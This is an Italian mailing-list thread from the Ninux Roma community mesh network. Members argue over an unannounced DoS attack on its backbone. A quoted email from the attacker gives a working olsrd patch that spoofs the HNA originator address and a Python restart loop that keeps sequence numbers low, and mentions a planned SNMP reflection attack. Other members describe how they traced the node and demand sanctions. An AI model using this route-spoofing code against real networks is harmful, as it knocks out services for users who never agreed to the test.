[Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

Andrea Pescetelli andrea.pescetelli a gmail.com
Dom 25 Maggio 2014 12:30:23 CEST 

Arka Buona Domenica anche a te
Perdona la dimenticanza.
Il 25/mag/2014 12:27 "Andrea Pescetelli" <andrea.pescetelli a gmail.com> ha
scritto:

> Non è sminuendo la cosa che si risolve il problema.
> Dove andare a colpire in un azione premeditata?
> I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri
> fanno gsoc e scambiano opinioni.
> Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta
> anche casa mia dove forse per qualche motivo in un futuro avrebbe potuto
> girarci anche il blog che gyardacaso non approva.
> Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche
> il mail server di Nino?
> Quale target? Una macchina guarda caso di casa al mare di Pierluigi che
> abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine
> quindo oltre al culo per sistemare pura la presa per il culo a fare la
> caccia alle streghe di un danno provocato senza avviso.
>
> No grazie se devo bestemmiare allora bestemmio e questo non è relax ma
> danno provocato e torno a ripetere che un provvedimento simbolico va preso.
> Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio.
>
> Se per voi questa è ninux allora non utilizzate i servizi che non
> approvate e fate un passo indietro.
>
>
>
>
> Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) <
> arkantiko a gmail.com> ha scritto:
>
>> Hola!
>>
>> Fish hai ragione dobbiamo fare qualcosa!!
>> Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
>> macellaio utilizzare un coltello.
>> Cosa dovremmo aver acquisito alla luce di ciò?
>> Che se arrivasse un assassino e si impadronisse del coltello, farebbe una
>> strage!
>>
>> Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha voglia
>> (e capacità) può farci male.
>>  I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
>> sicuramente non avvisino prima di agire!
>> Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
>> bestemmiare, insomma ... non si fa ;)
>>
>> Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
>> costruircela. A volte non basta fare il link migliore per poter dire di
>> avere una struttura solida.
>> Abbiamo anche bisogno di un motore che spinga!
>>
>> E poi ricordiamoci che ninux fa rima con relax!
>>
>> Io direi "fortuna che era un'azione controllata!" (e fatta apposta per
>> essere controllabile)
>>
>> Bella && Buona Domenica @tutti
>>
>> *--
>> Arka*
>>
>>
>>
>> Il giorno 25 maggio 2014 09:37, Andrea Pescetelli <
>> andrea.pescetelli a gmail.com> ha scritto:
>>
>> Ciao
>>> Vorrei chiedere di prendere provvedimenti seri a seguito di questi
>>> eventi e comportamenti che da una settimana stanno invalidando sia il
>>> rispetto reciproco sia il buon finzionamento della rete stessa da parte di
>>> Saverio Proto.
>>> Il 25/mag/2014 09:07 "Alessandro Gnagni" <alessandro a gnagni.it> ha
>>> scritto:
>>>
>>>>  Non è qualche ora. Va avanti da giovedì mattina.
>>>> Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
>>>> Jabber è stato ko da giovedì per sta cosa.
>>>> Il 25/mag/2014 01:03 "Saverio Proto" <zioproto a gmail.com> ha scritto:
>>>>
>>>>> Ciao,
>>>>>
>>>>> Metto in Cc: anche wireless a ml.ninux.org perché questa email contiene
>>>>> informazioni tecniche interessanti.
>>>>>
>>>>> bravi, avete risolto il problema in fretta :) Ho volutamente provato
>>>>> un attacco DoS sul backbone per capire che effetto poteva avere.
>>>>>
>>>>> ecco la patch di olsrd con cui generavo l'attacco DoS
>>>>>
>>>>> diff --git a/src/build_msg.c b/src/build_msg.c
>>>>> index 109f955..e252981 100644
>>>>> --- a/src/build_msg.c
>>>>> +++ b/src/build_msg.c
>>>>> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>>>>>    m = (union olsr_message *)msg_buffer;
>>>>>
>>>>>    /* Fill header */
>>>>> -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
>>>>> +  struct in_addr fakesource;
>>>>> +  fakesource.s_addr = 0;
>>>>> +  //inet_hton(2956867021,&fakesource);
>>>>> +  inet_aton("172.16.40.40",&fakesource);
>>>>> +  m->v4.originator = fakesource.s_addr;
>>>>>    m->v4.hopcnt = 0;
>>>>>    m->v4.ttl = MAX_TTL;
>>>>>    m->v4.olsr_msgtype = HNA_MESSAGE;
>>>>>
>>>>>
>>>>> una domanda,
>>>>>
>>>>> se avessi patchato anche:
>>>>>
>>>>> m->v4.hopcnt = XXX
>>>>>
>>>>> mettendo numeri casuali..
>>>>>
>>>>> sarebbe stato altrettanto facile capire chi è che iniettava questi
>>>>> messaggi ?
>>>>>
>>>>> mi sto divertendo parecchio con questi attacchi DoS, sono molto
>>>>> istruttivi. Per chi vuole giocare insieme a me a programmare in C
>>>>> possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
>>>>> che vorrei provare è DrDoS su snmp).
>>>>>
>>>>> un problema di questo attacco sono cmq i sequence number. Per rendere
>>>>> l'attacco efficace ho dovuto far andare la mia instanza patchata di
>>>>> OLSR a singhiozzo:
>>>>>
>>>>> import os
>>>>> import time
>>>>>
>>>>> while True:
>>>>>         os.system("olsrd")
>>>>>         print "started\n"
>>>>>         time.sleep(120)
>>>>>         os.system("killall olsrd")
>>>>>         print "killed\n"
>>>>>         time.sleep(300)
>>>>>
>>>>> in quanto avevo bisogno che i miei sequence number dovevano sempre
>>>>> essere piu bassi di quelli del spoofato, altrimenti venivano scartati
>>>>> come out of sequence.
>>>>>
>>>>> vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
>>>>> parte di come ti costruisce l'attacco e voi la parte di come avete
>>>>> fatto ad identificare il nodo spoofato ?
>>>>>
>>>>> ho staccatto il nodo attaccante, il gioco è finito :)
>>>>>
>>>>> ah... vi prego nessun malumore per qualche oretta di disservizi, this
>>>>> is Ninux. Si fanno queste cose perché ci si diverte insieme.
>>>>>
>>>>> ciao :)
>>>>>
>>>>> Saverio
>>>>>
>>>>> Il 24 maggio 2014 23:23, Andrea Pescetelli
>>>>> <andrea.pescetelli a gmail.com> ha scritto:
>>>>> > Saverio,
>>>>> > Abbiamo rilevato che dal nodo Gallia viene generato un messaggio
>>>>> olsr hna
>>>>> > con originator 172.16.40.40, validity time 570, hna 176.62.53.192/28
>>>>> > proveniente dal nodo in oggetto.
>>>>> >
>>>>> > Questo problema sta oscurando diversi servizi di ninux in farm
>>>>> appartenenti
>>>>> > a quella subnet.
>>>>> >
>>>>> > Abbiamo triangolato la posizione basandoci sugli hop count dei
>>>>> cammini
>>>>> > multipli.
>>>>> > puoi verificare?
>>>>> >
>>>>> > Grazie
>>>>> >
>>>>> > Fish, Hispanico, Halino
>>>>> > --
>>>>> > Andrea Pescetelli aka Fish
>>>>> > Skype: andrea5742
>>>>> > Ninux int: 5001/5002
>>>>> > Mobile: +39 3891156050
>>>>> >
>>>>> >
>>>>> >
>>>>> >
>>>>>
>>>>
>>>> _______________________________________________
>>>> Wireless mailing list
>>>> Wireless a ml.ninux.org
>>>> http://ml.ninux.org/mailman/listinfo/wireless
>>>>
>>>>
>>
>
>
> --
> Andrea Pescetelli aka Fish
> Skype: andrea5742
> Ninux int: 5001/5002
> Mobile: +39 3891156050
>
>
>
>
>
-------------- parte successiva --------------
Un allegato HTML è stato rimosso...
URL: <http://ml.ninux.org/pipermail/wireless/attachments/20140525/57d5fa98/attachment-0001.html>

Maggiori informazioni sulla lista Wireless